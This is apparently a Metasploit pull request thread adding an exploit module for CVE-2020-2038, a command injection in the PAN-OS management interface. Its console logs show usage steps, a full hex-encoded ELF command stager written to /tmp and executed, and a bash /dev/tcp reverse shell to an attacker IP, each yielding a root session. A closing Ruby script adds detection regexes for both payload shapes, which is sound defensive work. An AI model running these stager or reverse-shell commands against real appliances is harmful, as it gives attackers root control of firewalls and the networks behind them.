metasploit-framework
Add PAN-OS auth command injection module (CVE-2020-2038)
An OS Command Injection vulnerability in the PAN-OS management interface that allows authenticated administrators to execute arbitrary OS commands with root privileges. More info: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
This PR adds a fairly straightforward module to exploit the command injection vulnerability mentioned above and return a meterpreter session.
Verification
List the steps needed to make sure this thing works
- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/panos_auth_rce`
- [ ] Set the `RHOST`, `USERNAME`, and `PASSWORD` options
- [ ] Run the module
- [ ] Verify the api key is obtained successfully
- [ ] Receive a meterpreter session
```
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/panos_auth_rce) > set rhosts 192.168.2.196
rhosts => 192.168.2.196
msf6 exploit(linux/http/panos_auth_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(linux/http/panos_auth_rce) > set PASSWORD N0tpassword!
PASSWORD => N0tpassword!
msf6 exploit(linux/http/panos_auth_rce) > run
[*] Started reverse TCP handler on 192.168.2.114:4444
[*] Authenticating...
[+] Successfully obtained api key
[*] Exploiting...
[*] Sending stage (3020772 bytes) to 192.168.2.196
[*] Meterpreter session 1 opened (192.168.2.114:4444 -> 192.168.2.196:51132) at 2022-08-16 09:01:47 -0400
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : PA-VM-10-0-0.home
OS : Red Hat (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >
```
Nice job, Jack!!!
Thanks Will!! :)
Removing assignment. @jheysel-r7 et al, feel free to grab this one since I'm on research now.
Thanks for the updates @jheysel-r7! Everything looks good to me now. I tested against PAN-OS 9.1.3 and verified it works with both targets. I'll go ahead and land it.
- Example output
```
msf6 exploit(linux/http/panos_op_cmd_exec) > exploit lhost=10.0.0.19 rhosts=10.0.0.76 verbose=true USERNAME=msfuser PASSWORD=12345678
[*] Started reverse TCP handler on 10.0.0.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target appears to be vulnerable.
[*] Exploiting...
[*] Generated command stager: ["echo -en \\\\x7f\\\\x45\\\\x4c\\\\x46\\\\x02\\\\x01\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\x00\\\\x3e\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x78\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x38\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x01\\\\x00\\\\x00\\\\x00\\\\x07\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x40\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x7c\\\\x01\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x10\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x48\\\\x31\\\\xff\\\\x6a\\\\x09\\\\x58\\\\x99\\\\xb6\\\\x10\\\\x48\\\\x89\\\\xd6\\\\x4d\\\\x31\\\\xc9\\\\x6a\\\\x22\\\\x41\\\\x5a\\\\xb2\\\\x07\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x51\\\\x6a\\\\x0a\\\\x41\\\\x59\\\\x50\\\\x6a\\\\x29\\\\x58\\\\x99\\\\x6a\\\\x02\\\\x5f\\\\x6a\\\\x01\\\\x5e\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\x3b\\\\x48\\\\x97\\\\x48\\\\xb9\\\\x02\\\\x00\\\\x11\\\\x5c\\\\xc0\\\\xa8\\\\x01\\\\x13\\\\x51\\\\x48\\\\x89\\\\xe6\\\\x6a\\\\x10\\\\x5a\\\\x6a\\\\x2a\\\\x58\\\\x0f\\\\x05\\\\x59\\\\x48\\\\x85\\\\xc0\\\\x79\\\\x25\\\\x49\\\\xff\\\\xc9\\\\x74\\\\x18\\\\x57\\\\x6a\\\\x23\\\\x58\\\\x6a\\\\x00\\\\x6a\\\\x05\\\\x48\\\\x89\\\\xe7\\\\x48\\\\x31\\\\xf6\\\\x0f\\\\x05\\\\x59\\\\x59\\\\x5f\\\\x48\\\\x85\\\\xc0\\\\x79\\\\xc7\\\\x6a\\\\x3c\\\\x58\\\\x6a\\\\x01\\\\x5f\\\\x0f\\\\x05\\\\x5e\\\\x6a\\\\x7e\\\\x5a\\\\x0f\\\\x05\\\\x48\\\\x85\\\\xc0\\\\x78\\\\xed\\\\xff\\\\xe6>>/tmp/dilJm ; chmod 777 /tmp/dilJm ; /tmp/dilJm ; rm -f /tmp/dilJm"]
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3020772 bytes) to 10.0.0.76
[*] Meterpreter session 2 opened (10.0.0.19:4444 -> 10.0.0.76:42514) at 2022-09-15 17:36:03 +0200
[*] Command Stager progress - 100.00% done (1326/1326 bytes)
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer : PA-VM.None
OS : Red Hat (Linux 3.10.0-957.21.3.10.pan.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > [*] Shutting down Meterpreter...
[*] 10.0.0.76 - Meterpreter session 2 closed. Reason: Died
msf6 exploit(linux/http/panos_op_cmd_exec) > set target 1
target => 1
msf6 exploit(linux/http/panos_op_cmd_exec) > exploit lhost=10.0.0.19 rhosts=10.0.0.76 verbose=true USERNAME=msfuser PASSWORD=12345678
[+] bash -c '0<&81-;exec 81<>/dev/tcp/10.0.0.19/4444;sh <&81 >&81 2>&81'
[*] Started reverse TCP handler on 10.0.0.19:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Authenticating...
[+] Successfully obtained api key
[+] The target appears to be vulnerable.
[*] Exploiting...
[*] Command shell session 3 opened (10.0.0.19:4444 -> 10.0.0.76:42554) at 2022-09-15 17:37:09 +0200
id
uid=0(root) gid=0(root) groups=0(root)
```
Release Notes
This adds an exploit module that leverages an OS Command Injection vulnerability in the PAN-OS management interface versions 10.0 to 10.0.1, versions 9.1.0 to 9.1.4, and versions 9.0.0 to 9.0.10. This vulnerability is identified as CVE-2020-2038 and allows authenticated administrators to execute arbitrary OS commands with root privileges.
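The two example outputs above show exactly what lands on the PAN-OS management plane for each target: target 0 writes an ELF with `echo -en` to `/tmp`, then `chmod`s, runs and deletes it; target 1 opens a bash `/dev/tcp` reverse shell with file-descriptor redirection. The following is an added example, not code from this PR, from Metasploit or from Palo Alto Networks: a small set of Ruby heuristics a detection engineer could run over shell or process audit lines from the appliance to flag both shapes. The sample commands are constructed from the PR output (the stager's ELF body is cut after the header), the benign `tar` line is invented for contrast, and the verdict and indicator names are this example's own.

```ruby
# Added example for this PR thread (not Metasploit or Palo Alto code): regex
# heuristics that flag the two payload shapes visible in the output above when
# run over shell/process audit lines from a PAN-OS management plane. The sample
# commands are constructed from the PR output; the benign line is invented.

# Target 0 (dropper): ELF bytes written with `echo -en` to /tmp, then chmod,
# execute and delete. The ELF magic 7f 45 4c 46 is what survives randomization
# of the file name and payload.
ELF_ECHO_RE = /echo\s+-\w+\s+\\+x7f\\+x45\\+x4c\\+x46/i
TMP_DROP_RE = %r{>{1,2}\s*(/tmp/[^\s;|&]+)}
CHMOD_RE    = %r{chmod\s+(?:\+x|[0-7]{3,4})\s+(/tmp/[^\s;|&]+)}
RM_RE       = %r{rm\s+-f\s+(/tmp/[^\s;|&]+)}

# Target 1 (Unix command): bash /dev/tcp reverse shell with fd redirection.
DEV_TCP_RE  = %r{/dev/tcp/(\d{1,3}(?:\.\d{1,3}){3})/(\d{1,5})}
FD_SHELL_RE = /(?:^|[\s;'"])(?:ba)?sh\s*<&\d+\s*>&\d+/

# Returns a hash with :verdict, the list of matched :indicators, and, where
# extracted, the :dropped_path (target 0) or the :callback host:port (target 1).
def classify_command(cmd)
  hits = []
  info = {}

  hits << :elf_magic_via_echo if ELF_ECHO_RE.match?(cmd)
  if (m = TMP_DROP_RE.match(cmd))
    hits << :redirect_to_tmp
    info[:dropped_path] = m[1]
  end
  hits << :chmod_tmp_exec if CHMOD_RE.match?(cmd)
  hits << :self_delete    if RM_RE.match?(cmd)
  if (m = DEV_TCP_RE.match(cmd))
    hits << :dev_tcp_connect
    info[:callback] = "#{m[1]}:#{m[2]}"
  end
  hits << :fd_bound_shell if FD_SHELL_RE.match?(cmd)

  verdict =
    if hits.include?(:elf_magic_via_echo) && hits.include?(:redirect_to_tmp)
      :elf_echo_stager
    elsif hits.include?(:dev_tcp_connect) && hits.include?(:fd_bound_shell)
      :bash_tcp_reverse_shell
    elsif hits.include?(:dev_tcp_connect) || hits.size >= 2
      :suspicious
    else
      :benign
    end

  { verdict: verdict, indicators: hits }.merge(info)
end

# Constructed from the target-0 output above; the ELF body is cut after the
# header because only the magic and the drop/chmod/exec/rm chain are matched.
STAGER_CMD = <<~'CMD'.strip
  echo -en \\x7f\\x45\\x4c\\x46\\x02\\x01\\x01\\x00>>/tmp/dilJm ; chmod 777 /tmp/dilJm ; /tmp/dilJm ; rm -f /tmp/dilJm
CMD

# Constructed from the target-1 output above.
REVERSE_SHELL_CMD = "bash -c '0<&81-;exec 81<>/dev/tcp/10.0.0.19/4444;sh <&81 >&81 2>&81'"

# Invented benign line for contrast (a support bundle being written to /tmp).
BENIGN_CMD = "tar -czf /tmp/techsupport.tgz /var/log/pan"

# Runs the classifier over the three constructed samples.
def scan_samples
  { stager: STAGER_CMD, reverse_shell: REVERSE_SHELL_CMD, benign: BENIGN_CMD }
    .transform_values { |cmd| classify_command(cmd) }
end

if __FILE__ == $PROGRAM_NAME
  scan_samples.each do |name, result|
    puts "#{name}: #{result[:verdict]} #{result[:indicators].inspect}"
  end
end
```

A single `>` into `/tmp` on its own is left at `benign` so that ordinary administrative writes do not page anyone; the verdict only escalates when the ELF magic, the `/dev/tcp` connect, or two or more indicators appear together in one command line. The regexes tolerate any number of backslashes before the hex escapes because the stager is shell-escaped once more each time it passes through a layer (the Ruby `inspect` output above shows four).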